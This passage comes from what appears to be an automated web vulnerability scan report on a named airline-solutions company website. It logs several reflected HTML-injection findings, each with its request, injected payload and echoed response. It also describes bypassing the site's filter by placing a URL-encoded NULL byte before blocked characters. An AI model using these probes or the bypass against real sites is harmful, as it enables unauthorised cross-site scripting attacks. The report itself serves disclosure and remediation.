GET /home/news_events/event/operations_user_conference2?%0053da6"><a>69ed5e196d9=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:05:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316332; expires=Wed, 05-Oct-2011 17:05:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:05:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/operations_user_conference2?%0053da6"><a>69ed5e196d9=1">
...[SNIP]...

3.108. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_airmax_group_manager_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005dcdb<a>b490fc50a32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dcdb<a>b490fc50a32 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_airmax_group_manager_user_conference?%005dcdb<a>b490fc50a32=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:28:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322312; expires=Thu, 06-Oct-2011 09:28:50 GMT; path=/
Set-Cookie: exp_last_activity=1286375330; expires=Thu, 06-Oct-2011 09:28:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fnews_events%2Fevent%2Fsabre_airmax_group_manager_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:29:11 GMT
Pragma: no-cache
Content-Length: 6157
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>b490fc50a32=1">sabre airmax group manager user conference?%005dcdb<a>b490fc50a32=1</a>
...[SNIP]...

3.109. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_airmax_group_manager_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d2c1"><a>4ad3ce3d1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d2c1"><a>4ad3ce3d1ba in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_airmax_group_manager_user_conference?%005d2c1"><a>4ad3ce3d1ba=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:24:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322312; expires=Thu, 06-Oct-2011 09:24:47 GMT; path=/
Set-Cookie: exp_last_activity=1286375085; expires=Thu, 06-Oct-2011 09:24:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fnews_events%2Fevent%2Fsabre_airmax_group_manager_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:24:51 GMT
Pragma: no-cache
Content-Length: 6161
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/sabre_airmax_group_manager_user_conference?%005d2c1"><a>4ad3ce3d1ba=1">
...[SNIP]...

3.110. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_developers_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004724d<a>de69e323185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4724d<a>de69e323185 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_developers_conference?%004724d<a>de69e323185=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:19:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322323; expires=Thu, 06-Oct-2011 09:19:29 GMT; path=/
Set-Cookie: exp_last_activity=1286374769; expires=Thu, 06-Oct-2011 09:19:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:19:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>de69e323185=1">sabre developers conference?%004724d<a>de69e323185=1</a>
...[SNIP]...

3.111. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_developers_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009ed1a"><a>8673101f51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed1a"><a>8673101f51b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_developers_conference?%009ed1a"><a>8673101f51b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322323; expires=Thu, 06-Oct-2011 09:14:44 GMT; path=/
Set-Cookie: exp_last_activity=1286374484; expires=Thu, 06-Oct-2011 09:14:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:15:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/sabre_developers_conference?%009ed1a"><a>8673101f51b=1">
...[SNIP]...

3.112. http://www.sabreairlinesolutions.com/home/news_events/event/sabresonic_global_conference2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabresonic_global_conference2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fa4dd"><a>9d5dbf18594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4dd"><a>9d5dbf18594 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabresonic_global_conference2?%00fa4dd"><a>9d5dbf18594=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:47:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286326075; expires=Wed, 05-Oct-2011 19:47:55 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 19:48:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/sabresonic_global_conference2?%00fa4dd"><a>9d5dbf18594=1">
...[SNIP]...

3.113. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001a64e<a>01c1bfa4f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a64e<a>01c1bfa4f75 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/events?%001a64e<a>01c1bfa4f75=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:19:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:19:26 GMT; path=/
Set-Cookie: exp_last_activity=1286374766; expires=Thu, 06-Oct-2011 09:19:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:19:47 GMT
Pragma: no-cache
Content-Length: 7604
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>01c1bfa4f75=1">events?%001a64e<a>01c1bfa4f75=1</a>
...[SNIP]...

3.114. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d477e"><a>99c5e77902a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d477e"><a>99c5e77902a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/events?%00d477e"><a>99c5e77902a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:14:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:14:37 GMT; path=/
Set-Cookie: exp_last_activity=1286374477; expires=Thu, 06-Oct-2011 09:14:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:15:02 GMT
Pragma: no-cache
Content-Length: 7608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/events?%00d477e"><a>99c5e77902a=1">
...[SNIP]...

3.115. http://www.sabreairlinesolutions.com/home/news_events/events/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dab69"><a>b2f5fb7df3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dab69"><a>b2f5fb7df3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/events/?%00dab69"><a>b2f5fb7df3c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 20:00:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286326810; expires=Wed, 05-Oct-2011 20:00:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 20:00:23 GMT
Pragma: no-cache
Content-Length: 7654
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
